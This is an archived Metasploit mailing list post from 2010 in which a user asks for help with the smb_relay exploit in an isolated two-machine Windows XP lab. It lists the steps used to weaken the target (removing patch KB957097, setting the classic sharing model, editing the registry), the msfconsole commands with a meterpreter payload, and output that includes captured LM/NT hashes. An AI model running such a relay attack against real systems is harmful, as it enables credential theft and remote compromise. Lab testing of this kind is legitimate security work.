Metasploit mailing list archives

smb_relay returns "[-] Failed to authenticate"

From: Christian Schäfer <syrious3000 () hotmail de>
Date: Wed, 29 Dec 2010 20:18:03 +0100


Hello,


I'm just trying to get the smb_relay exploit working on an isolated test-asset containing of 2 win xp sp3 machines with 
Metasploit Framework 3.5.1. for demonstration purpose.

attacker: 192.168.69.7 
victim: 192.168.69.3


To get the exploit working I uninstalled the Win Security Update KB957097 (from both machines) which prevents the 
exploit.

After that I set LocalSecuritySettings / LocalPolicies / SecurityOptions / NetworkAccess: Sharing and Security model 
for local accounts to:  "Classic" on the vicitim.

Then I executed:  gpupdate /force in windows shell


On the attacking machine I set following network config:

tcp/ip / advanced/wins:  disabled (to get port 139 free)

client for ms networks:   enabled

file & printer sharing...:  enabled


I made a change in the registry to get port 445 free) by setting:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] 
"SMBDeviceEnabled"=dword:00000000


I executed the exploit with the following commands and got a "Failed to authenticate" ...please help :(
(SYRDSL = computer name , test = username and password)

msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(smb_relay) > set SRVHOST 192.168.69.7
SRVHOST => 192.168.69.7
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
[*] Started bind handler
[*] Server started.
[*] Received 192.168.69.3:1079 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.69.3:1079 \
[*] Received 192.168.69.3:1079 SYRDSL\test LMHASH:3e5a5ee7d3fd22d72fc039c755c14c9c33eb1778f2f939cc 
NTHASH:1934e7b2bfe1bd8979b505fdcfbc03cc44bd94334991444b OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.69.3 as SYRDShttps://snt126.mail.live.com/default.aspx?rru=inbox&wa=wsignin1.0L\test...
[*] Trying to AUTHENTICATE: username= test , domain= SYRDSL
[-] Failed to authenticate as SYRDSL\test...


On the victim machine I tried:

typing in the explorer address line:  \\192.168.69.7\fakeShare\fakeFile.jpg

or in windows shell: net use \\192.168.69.7\ipc$ to trigger the exploit 



I would apreciate any hint...because I urgently need to get it working...please help :/
If i missed some important information  please tell and I will provide it.

Cheers
Christian

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

smb_relay returns "[-] Failed to authenticate" Christian Schäfer (Dec 29)
- Re: smb_relay returns "[-] Failed to authenticate" Brian (Dec 29)
- Re: smb_relay returns "[-] Failed to authenticate" Christian Schäfer (Dec 30)